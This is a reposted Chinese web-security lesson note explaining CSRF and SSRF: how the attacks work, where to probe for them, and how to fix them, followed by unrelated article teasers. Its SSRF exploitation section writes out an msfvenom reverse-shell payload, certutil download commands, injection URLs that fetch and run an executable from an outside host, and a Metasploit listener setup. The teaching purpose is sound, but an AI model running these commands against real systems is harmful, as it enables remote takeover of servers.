小迪安全39WEB 攻防-通用漏洞CSRFSSRF协议玩法内网探针漏洞利用

#知识点: 逻辑漏洞

1CSRF-原理&危害&探针&利用等

2SSRF-原理&危害&探针&利用等

3CSRF&SSRF-黑盒下漏洞探针点

#详细点:

CSRF 全称:Cross-site request forgery,即,跨站请求伪造,也被称为 “One

Click Attack” “Session Riding”,通常缩写为 CSRF 或者 XSRF,是一种对网

站的恶意利用。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但

自己的 qq 号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义

伪造请求,执行恶意操作,具有很大的危害性。

CSRF 的攻击过程两个条件:

1、目标用户已经登录了网站,能够执行网站的功能。

2、目标用户访问了攻击者构造的 URL

CSRF 安全问题黑盒怎么判断:

  1. 看验证来源不-修复 ——同源策略

    Referer:检测同源,但不是绝对的安全,此头部可以被抓取修改的

  2. 看凭据有无 token--修复

Token:一种标识,每操作一次,都会进行更改

3、看关键操作有无验证-修复

-CSRF 安全问题白盒怎么审计:

同黑盒思路一样,代码中分析上述三看

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形

成由服务端发起请求的一个安全漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问

的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离

的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功

能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定

地址的图片,下载等等。

-SSRF 黑盒可能出现的地方:

这些是都会向服务器去请求我们所发送的信息,若配置不当,我们输入了访问它自身的地址,则会回显出它自身的情况

1.社交分享功能:获取超链接的标题等内容进行显示

2.转码服务:通过 URL 地址把原地址的网页内容调优使其适合手机屏幕浏览

3.在线翻译:给网址翻译对应网页的内容

4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过 URL 地址加载或下

载图片

5.图片/文章收藏功能:主要其会取 URL 地址中 title 以及文本的内容作为显示以求一

个好的用具体验

6.云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的

信息,就可以进行 ssrf 测试

7.网站采集,网站抓取的地方:一些网站会针对你输入的 url 进行一些信息采集工作

8.数据库内置功能:数据库的比如mongodb的copyDatabase函数
9。邮件系统:比如接收邮件服务器地址
10.编码处理,属性信息处理,文件处理:比如ffpmg,ImageMagick, docx, pdf, xml处理器等
11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法(inurl:)加上这些关键字去寻找SSRF漏洞一些的url中的关键字: share. wap、 url、 link. src、 source. target. U、3g、 display、sourceURI、imageURL. domain..
12从远程服务器请求资源(upload from url如discuz! ; import & expost rss feed如weDblog;使用了xml引擎对象的地方如wordpress xmlrpc.php)


-SSRF白盒可能出现的地方:
1、功能点抓包指向代码块审计
2、功能点函数定位代码块审计

-SSRF常见安全修复防御方案:

1.禁用跳转

2、禁用不需要的协议

3、固定或限制资源地址

4、错误信局统一信息处理


#系列内容点:

1、 CSRF&SSRF&原理&利用&协议等

2、 CSRF&SSRF&黑盒&审计&修复等

CSRF-原理&后台自动添加管理员

Ø  SSRF-原理&服务&协议&内网&漏洞

Ø  SSRF-某实际案例测试演示(功能点)

#CSRF-原理&后台自动添加管理员

-案例说明:小迪在登录后台管理自己网站的时候,突然群里给小迪说阿祖又说爱上别人

了,随后给我发了个 URL 链接,小迪直接点了进去,GG

小迪的网站:http://test.xiaodi8.com/

发送的 URLhttp://47.94.236.117/add.html

点击了此链接,管理员就突然多了一个

需要对网站源码有一定了解,调试合理的数据包

通过调式数据包,进行构造对应的链接地址

利用流程:

1、获取目标的触发数据包

2、利用 CSRFTester 构造导出

3、诱使受害者访问特定地址触发

#SSRF-原理&服务&协议&内网&漏洞

-参考文章:https://www.t00ls.cc/articles-41070.html

-案例说明:小迪在本地创建了远程图片文件加载应用,直接被攻击者利用 SSRF 探针本

地及内网服务,并利用某漏洞直接获取到内网某主机的权限!

解决了内部通讯的问题

1、服务探针:

http://127.0.0.1/ssrf.php

图片功能:

用户:自己将电脑的图片上传,自己给一个URL让服务器解析上传

  1. 可本地上传到服务器
  2. 远程加载图片地址上传服务器

服务器:

  1. 访问图片地址
  2. 下载图片上传服务器

故:自己上给自己内部请求,达到服务器伪造请求

可以做探针,去探它的内部资源和端口资源

http://127.0.0.1/

http://127.0.0.1:3306/ ——说明本地有安装mysql

内网IP私有地址:

A:10.0.0.0~10.255.255.255

B:172.16.0.0~172.31.255.255

C:192.168.0.0~192.168.255.255

为此我们使用虚拟机来充当内网,进行检测

在虚拟机中构造一个8080端口来进行端口检测

内网捕获成功

注:一般的实战中内网会去做一些IP覆盖等保护手段(如CDN)

2、协议玩法:

file:///D:/w.txt

dict://127.0.0.1:3306/info

ftp://192.168.46.148:21

3、内网扫描:

http://192.168.46.148:8080

以黑盒的角度:对其内网地址进行爆破扫描

4、漏洞利用(理想):

-生成xx.exe:msfvenom -p windows/meterpreter/reverse_http LHOST=47.94.236.117 LPORT=6688 -f exe -o xx.exe


生成文件下载口令certutil.exe -urlcache -split -f http://192.168.162.142:80/xx.exe xx.exe

-监听:

msfconsole

 

上传木马http://192.168.162.138:8080/?search==%00{.exec|cmd.exe%20/c%20certutil%20-urlcache%20-split%20-f%20http://47.94.236.117/xx.exe.}

建立会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

设置监听状态

set lhost 0.0.0.0

set lport 6688

run

-执行木马:

http://192.168.162.138:8080/?search==%00{.exec|xx.exe.}

上线:

查看服务器端(虚拟机)的任务状态

通常可能会被防火墙等拦截,木马查杀,协议不支持等

#SSRF-某实际案例测试演示(功能点)

基于上述的 SSRF 的漏洞原理,漏洞探针开展黑盒思路分析那些可能存在

1.

正常输入127.0.0.1

当输入http://127.0.0.1,发现页面变了,说明存在ssrf,只是不知道它过滤了多少协议

2.

修改url的内容,访问本地服务器

出了回显,说明存在ssrf

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/740506.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ThingsBoard开源物联网平台介绍

1. Thingsboard 简介 ThingsBoard是一个基于Java的开源物联网平台,旨在实现物联网项目的快速开发、管理和扩展。它使用行业标准的物联网协议(MQTT、CoAP和HTTP)实现设备连接,并支持云和本地部署。ThingsBoard结合了可扩展性、容错…

Springboot+vue的疫情居家办公系统(有报告)。Javaee项目,springboot vue前后端分离项目。

演示视频: Springbootvue的疫情居家办公系统(有报告)。Javaee项目,springboot vue前后端分离项目。 项目介绍: 采用M(model)V(view)C(controller&#xff09…

上海计算机学会 2023年11月月赛 丙组T5 推箱子(数学 思维 排序)

第五题:T5推箱子 标签:排序、数学、思维题意:给定 t t t组数据,每组数据给定长度为 n n n的字符串, 表示箱子, _ \_ _表示空格,求把箱子都推到一起(即两两箱子之间没有空格&#…

Ubuntu18.04 安装搜狗输入法

一. 概述 自己的Ubuntu 18.04系统配置中文搜狗输入法,安装步骤,亲测可用 二. 安装步骤 2.1 确认系统版本和CPU架构 查看Ubuntu系统版本号,通过命令 lsb_release -a wuubuntume:~$ lsb_release -a No LSB modules are available. Distr…

安装Android Studio遇到Unable to access Android SDK add-on list的错误

第一次安装android studio的时候,提示:unable to access Android sdk add-on list 解决办法 这个错误一般是android studoi代理没有设置导致的,需要在setting里面设置: 点击Android Studio - Preferences,在 Appeara…

Linux中文件的权限

我们首先需要明白,权限 用户角色 文件的权限属性 一、拥有者、所属组和other(用户角色) 以文件file1为例 第一个箭头所指处即是文件的拥有者,拥有者为zz 第二个箭头所指处即使文件的所属组,所属组为zz 除去拥有者…

基于log4cpp封装日志类

一、log4cpp的使用 1. 下载log4cpp log4cpp官方下载地址 2. 安装log4cpp 第一步:解压 tar zxvf log4cpp-1.1.4.tar.gz 第二步:进入log4cpp文件夹并执行 ./configure tips:如果是ARM架构的CPU可能会失败,如下面这种情况&a…

Ubuntu查看ros版本-linux查看ros版本

使用ros带的rosversion命令即可查看自己的ros版本: rosversion -d

MATLAB算法实战应用案例精讲-【图像处理】边缘检测算子

目录 前言 数字图像处理基础知识与算法 1).数字图像 2).二值图像、灰度图像、彩色图像

如何在Windows中检测任何串行设备的COM端口?这里有一个应用程序

使用USB串行设备并不是最简单的工作流程。我们首先需要标识“设备管理器”下的COM端口,然后需要告诉应用程序使用该COM端口。 如果我们可以接收COM设备的自动通知,然后将它们配置为使用特定应用程序打开,该怎么办?Serial Port Notifier程序正是我们所需要的。 在最基本的级…

【Node.js从基础到高级运用】八、Express 框架入门

Express 框架入门 Express 是一个灵活且广泛使用的 Node.js web 应用框架,它提供了一系列强大特性来帮助开发者创建各种 Web 和移动设备应用。在这一节中,我们将介绍如何安装和配置 Express,并简单探讨其路由和中间件的概念。 安装 Express…

【计算机网络】UDP/TCP 协议

TCP 协议 一、传输层1. 再谈端口号2. 端口号范围划分3. 进程和端口号4. netstat5. pidof 二、UDP 协议1. UDP 协议端格式(报文)2. UDP 的特点3. 面向数据报4. UDP 的缓冲区 三、TCP 协议1. 认识 TCP2. TCP 协议段格式(1)4 位首部长度(2&#…

爬蟲IP代理詳細指南

收集數據算是比較麻煩的任務,尤其是當數據量很大時。在網路抓取時暴露IP地址是常有的事,所以需要用到代理抓取工具,提供高效可靠的數據提取。 爬蟲IP代理抓取工具到底指什麼,以及如何在各種情況下使用它,比如說繞過地…

Spring Boot+Vue前后端分离项目如何部署到服务器

🌟 前言 欢迎来到我的技术小宇宙!🌌 这里不仅是我记录技术点滴的后花园,也是我分享学习心得和项目经验的乐园。📚 无论你是技术小白还是资深大牛,这里总有一些内容能触动你的好奇心。🔍 &#x…

对话Shopify:平台工程如何帮助其自动化应对流量高峰

本文脱胎于 Obeservability Talk,完整内容请查看: https://www.youtube.com/watch?v6ShtsTTUizI 平台工程是近年来的热门话题。我们已经在 2023 年看到了开发人员们对它的追捧,预计在 2024 年后,我们也许会看到平台工程被广泛应用…

NVidia NX 中 ROS serial软件包的安装

自己装的ROS是noetic版本,受限于网络,直接用命令安装串口包不行。于是手动安装了一次。 1 下载源码 git clone https://github.com/wjwwood/serial.git 或者直接在浏览器里面输入 https://github.com/wjwwood/serial.git 2 解压 然后在serial&#xf…

OPC UA 服务器的Web访问

基于Web 的应用非常普及,例如基于web 的SCADA ,物联网 Dashboard 等等,那么基于Web 的应用如何访问OPC UA 服务器呢?本博文讨论这方面的问题。 Web 的通信方式 Web 是我们通常讲的网站,它由浏览器,HTTP 服…

sqllab第二关通关笔记

知识点整理: 数值型注入判断手法 1/1 1/0 回显不同错误注入函数 extractvalue(xml_flag,xpath) xml_flag:文件表示符xpath:文件路径;不能识别‘~’ ‘#’ 等特殊字符;遇到就报错并打印xpath内容~(十六进制表示)&#…

架构师之路:中台和微服务区别

什么是中台架构? 中台架构是一种将业务逻辑和技术能力模块化的架构思想,通过构建统一的中间层服务,将业务能力和技术能力解耦,使得各业务领域的功能和服务能够共享和复用。中台包括业务中台和技术中台两个方面: 业务…

YOLOv9改进 添加可变形注意力机制DAttention

一、Deformable Attention Transformer论文 论文地址:arxiv.org/pdf/2201.00520.pdf 二、Deformable Attention Transformer注意力结构 Deformable Attention Transformer包含可变形注意力机制,允许模型根据输入的内容动态调整注意力权重。在传统的Transformer中,注意力是…